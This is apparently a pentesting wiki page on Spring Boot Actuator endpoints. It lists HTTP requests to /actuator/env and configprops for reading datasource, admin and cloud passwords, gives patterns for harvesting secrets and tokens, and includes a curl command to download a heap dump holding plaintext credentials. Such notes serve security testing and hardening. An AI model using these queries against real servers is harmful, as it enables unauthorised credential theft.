Page cover
Edit

Spring-Boot

Open-source Java framework used for Spring-based applications

Querying tricks

Using Property Patterns

When you see patterns like:
spring.datasource.url
spring.datasource.username
spring.datasource.password

  • You can use these patterns in two ways:

Direct Access
/actuator/env/spring.datasource.password
Prefix Queries
/actuator/configprops/spring.datasource

Environment Variable

Spring Boot automatically maps environment variables to its property format following these rules:

  • Uppercase letters

  • Replace dots with underscores

  • Replace hyphens with underscores

  • Remove special characters

You can query these directly: 
/actuator/env/SPRING_DATASOURCE_PASSWORD
Actuators

Actuators are management endpoints, those are the most important for you:

/actuator/health and /actuator/info are public available

  • /dump or /threaddump - Exposes data in memory.

  • /trace or /httptrace - Shows recent HTTP requests.

  • /logfile - Exposes application log files.

  • /env or /actuator/env - Reveals environment variables, configuration properties, and system settings.

  • /mappings - Shows all URL mappings and endpoints.

  • /heapdump - Downloads a heap dump file containing all objects in memory.

  • /shutdown - Allows remote shutdown of the application

  • /restart - Allows remote restart of the application

SecLists has a great wordlist: Javascript-Spring-Boot

Enumeration

  1. From /actuator/beans, identify interesting components

  2. From /actuator/configprops, find configuration for those components

  3. From /actuator/env, find the actual values

Configuration Discovery with /actuator/env

Look for interesting patterns:

  • Database properties (spring.datasource.*)

  • Security properties (spring.security.*)

  • Cloud properties (spring.cloud.*)

Try prefix queries to see related properties:
GET /actuator/configprops/spring.datasource
Finding Database Credentials
GET /actuator/env/spring.datasource.url
GET /actuator/env/spring.datasource.username
GET /actuator/env/spring.datasource.password
Finding Custom Application Properties
GET /actuator/env/app.admin.username
GET /actuator/env/app.admin.password
If the application uses Spring Cloud, look for:
"spring.cloud.config.uri"
"spring.cloud.config.username"
"spring.cloud.config.password"

Try Different content types

application/vnd.spring-boot.actuator.v3+json
application/json
Automate this key patterns
spring.security.*
*.password
*.secret
*.key
*.credential
*.token
spring.datasource.*
spring.jpa.*
spring.mongodb.*
spring.redis.*
spring.cloud.*
eureka.*
consul.*
vault.*
app.*
application.*
[application-name].*
CVE-2025-48927 - /heapdump exposed - Initialization of a Resource with an Insecure Default
Download a ~150MB file containing plain-text usernames and passwords and much more :) 
curl -X GET http://IP/actuator/heapdump

Use VisualVM took at the files from the dump comfortably

Read this article from Wiz

PreviousGrafanaNextNeo4j

Last updated